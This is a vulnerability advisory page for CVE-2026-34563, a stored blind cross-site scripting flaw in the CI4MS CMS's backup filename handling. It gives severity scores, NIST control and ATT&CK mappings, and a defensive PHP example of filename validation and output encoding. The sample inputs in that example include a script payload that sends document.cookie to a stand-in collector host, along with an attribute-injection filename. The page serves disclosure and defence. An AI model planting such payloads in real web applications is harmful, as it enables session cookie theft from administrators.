Cyber Posture

CVE-2026-34563

Critical · Public PoC

Published: 01 April 2026
Modified: 07 April 2026
KEV Added: not listed
Patch: available (fixed in 0.31.0.0)
CVSS Score: 9.1 (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:L)
EPSS Score: 0.0005 (15.4th percentile)
Risk Priority: 18 (weighted 60% EPSS, 20% KEV, 20% CVSS)

Summary

CVE-2026-34563 is a critical-severity Cross-site Scripting (CWE-79) vulnerability in Ci4-Cms-Erp Ci4Ms. Its CVSS base score is 9.1 (Critical).

Operationally, exploitation maps to the MITRE ATT&CK technique Exploit Public-Facing Application (T1190). EPSS ranks the CVE at the 15.4th percentile by exploit likelihood, below the median, and it is not currently listed in the CISA KEV catalog, although a public proof-of-concept is referenced.

The strongest mitigations our analysis identified are NIST 800-53 SI-10 (Information Input Validation) and SI-15 (Information Output Filtering).

Threat & Defense at a Glance

What attackers do: exploitation maps to Exploit Public-Facing Application (T1190) and 2 other techniques. What defenders deploy: see the NIST 800-53 controls recommended below.
Threat & Defense Details

Mitigating Controls (NIST 800-53 r5)

SI-10 Information Input Validation (prevent): validate user-controlled inputs such as backup filenames at upload time so that a JavaScript payload cannot be stored during upload processing.

SI-15 Information Output Filtering (prevent): encode or filter the values rendered in the backup management views so that a stored payload is neutralized before the browser renders it.

SI-9 Information Input Restrictions (prevent): restrict the characters and patterns accepted in filenames at the upload boundary. Note that SI-9 was withdrawn in Revision 4 and folded into AC-2, AC-3, AC-5 and AC-6; under r5 the input-restriction intent is carried by SI-10, so treat this entry as reinforcing the SI-10 control rather than as a separate control.

MITRE ATT&CK Enterprise Techniques

T1190 Exploit Public-Facing Application Initial Access
Adversaries may attempt to exploit a weakness in an Internet-facing host or system to initially access a network.
T1059.007 Command and Scripting Interpreter: JavaScript Execution
Adversaries may abuse various implementations of JavaScript for execution.
T1539 Steal Web Session Cookie Credential Access
An adversary may steal web application or service session cookies and use them to gain access to web applications or Internet services as an authenticated user without needing credentials.
Why these techniques?

Stored XSS in public-facing CMS web app enables T1190 exploitation to inject/execute JS (T1059.007) in admin browsers, directly facilitating session cookie theft (T1539).

Confidence: HIGH · MITRE ATT&CK Enterprise v18.1

NVD Description

CI4MS is a CodeIgniter 4-based CMS skeleton that delivers a production-ready, modular architecture with RBAC authorization and theme support. Prior to version 0.31.0.0, the application fails to properly sanitize user-controlled input when handling backup uploads and processing backup metadata. An attacker can inject a malicious JavaScript payload into the backup filename via the uploaded xss.sql, which uses SQL functionality to insert the XSS payload server-side. This stored payload is later rendered unsafely in multiple backup management views without proper output encoding, leading to stored blind cross-site scripting (Blind XSS). This issue has been patched in version 0.31.0.0.

Deeper analysis

CVE-2026-34563 is a stored blind cross-site scripting (XSS) vulnerability (CWE-79) affecting CI4MS, a CodeIgniter 4-based CMS skeleton providing production-ready modular architecture with RBAC authorization and theme support. In versions prior to 0.31.0.0, the application does not properly sanitize user-controlled input during backup upload handling and metadata processing. This allows injection of a malicious JavaScript payload into the backup filename, such as via an uploaded file named xss.sql, which leverages SQL functionality to insert the payload server-side. The stored payload is then rendered without proper output encoding in multiple backup management views. The vulnerability carries a CVSS v3.1 base score of 9.1 (AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:L).

An authenticated attacker with low privileges (PR:L) can exploit this issue remotely over the network with low complexity. The published vector records UI:N, but in practice the stored payload fires only when an administrator or another user opens one of the affected backup management views. The attacker uploads a crafted backup file whose name, or whose SQL content, carries the XSS payload, which is then written into the backup metadata server-side. When a victim views an affected backup management interface, the unencoded payload executes in their browser. Because the code runs in the victim's browser rather than in the vulnerable application (the reason for S:C), it can exfiltrate session cookies, captured keystrokes, or any other data visible to that user (C:H).

The issue has been addressed in CI4MS version 0.31.0.0, as detailed in the project's GitHub release notes and security advisory (GHSA-85m8-g393-jcxf). Upgrade to the patched version, review other upload and metadata-handling paths for the same input-validation and output-encoding gaps, and check whether backup metadata written before the upgrade still contains payloads, since a fix to the views does not by itself rewrite rows that were stored earlier.
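The following PHP script is an added example, not CI4MS project code, and serves both the control mapping above (SI-10 at the upload boundary, SI-15 at the output boundary) and the post-upgrade review suggested here. It validates a backup filename against a strict whitelist, shows the same filename rendered into an HTML row both unencoded and encoded, and scans a constructed list of already-stored names for entries the upload rule would now reject. It uses htmlspecialchars() so it runs with plain `php`; inside a CodeIgniter 4 view the equivalent call is the framework's esc() helper. The function names, the regex, and the sample filenames are assumptions made for this example. One caveat drawn from the NVD text: the payload may also enter the metadata through SQL inside the uploaded file rather than through the filename alone, so output encoding is the control that holds regardless of how the name was stored.

```php
<?php
declare(strict_types=1);

// Added example (not CI4MS project code). It reproduces the two control points
// the advisory names: validating a backup filename on upload (SI-10) and
// encoding it before it reaches the HTML view (SI-15), plus a one-off scan of
// already-stored names so a payload planted before the upgrade is found.
// htmlspecialchars() is used so this runs with plain `php`; inside a
// CodeIgniter 4 view the equivalent call is esc($value) (html context).

// Whitelist (an assumption for this example): a short basename ending in .sql.
// Anything else (path separators, '<', quotes, spaces) is rejected outright
// rather than "cleaned", so there is no ambiguity about what was stored.
function validateBackupFilename(string $name): bool
{
    return preg_match('/\A[A-Za-z0-9][A-Za-z0-9._-]{0,99}\.sql\z/', $name) === 1;
}

// SI-10 at the upload boundary: never persist the client-supplied name as-is.
// Returns null on rejection; the caller stops the upload and logs the attempt.
function acceptUpload(string $clientName): ?string
{
    return validateBackupFilename($clientName) ? $clientName : null;
}

// Vulnerable rendering: client-controlled text is concatenated into HTML.
function renderRowUnsafe(string $filename): string
{
    return "<tr><td>{$filename}</td></tr>";
}

// SI-15 at the output boundary: encode for HTML body/attribute context.
function renderRowSafe(string $filename): string
{
    $escaped = htmlspecialchars($filename, ENT_QUOTES | ENT_HTML5 | ENT_SUBSTITUTE, 'UTF-8');
    return "<tr><td>{$escaped}</td></tr>";
}

// Post-upgrade check: a fix that encodes on output does not remove rows that
// were stored earlier. Flag every stored name the upload rule would now reject.
function findSuspiciousStoredNames(array $storedNames): array
{
    return array_values(array_filter($storedNames, fn (string $n) => !validateBackupFilename($n)));
}

// Constructed sample inputs (not from the advisory): one benign name and one
// carrying a script tag of the kind a stored-XSS payload would use.
$benign  = 'site-2026-04-01.sql';
$payload = '<script>document.location="https://collector.example/?c="+document.cookie</script>.sql';

foreach ([$benign, $payload] as $name) {
    printf("upload %-12s %s\n", acceptUpload($name) === null ? 'REJECTED' : 'accepted', $name);
}

// What an admin's browser would receive if the stored payload reached the view:
echo "unsafe: " . renderRowUnsafe($payload) . "\n";   // script tag intact, executes in the browser
echo "safe:   " . renderRowSafe($payload) . "\n";     // angle brackets and quotes encoded, inert text

// Scan of a constructed "backups" table after patching; the two crafted names are returned:
print_r(findSuspiciousStoredNames([$benign, $payload, 'weekly.sql', 'a"onmouseover="alert(1).sql']));
```

The rejection rule is deliberately a whitelist rather than a blacklist of `<script>`: the second crafted name in the scan carries no tag at all and would only fire inside an unquoted or double-quoted attribute, which a tag filter misses but a character whitelist catches.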

Details

CWE(s)

CWE-79 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

Affected Products

ci4-cms-erp
ci4ms
< 0.31.0.0 (fixed in 0.31.0.0)

CVEs Like This One

CVE-2026-34569 (same product: Ci4-Cms-Erp Ci4Ms)
CVE-2026-34559 (same product: Ci4-Cms-Erp Ci4Ms)
CVE-2026-34567 (same product: Ci4-Cms-Erp Ci4Ms)
CVE-2026-34562 (same product: Ci4-Cms-Erp Ci4Ms)
CVE-2026-34565 (same product: Ci4-Cms-Erp Ci4Ms)
CVE-2026-34568 (same product: Ci4-Cms-Erp Ci4Ms)
CVE-2026-27599 (same product: Ci4-Cms-Erp Ci4Ms)
CVE-2026-34557 (same product: Ci4-Cms-Erp Ci4Ms)
CVE-2026-34560 (same product: Ci4-Cms-Erp Ci4Ms)
CVE-2026-35035 (same product: Ci4-Cms-Erp Ci4Ms)
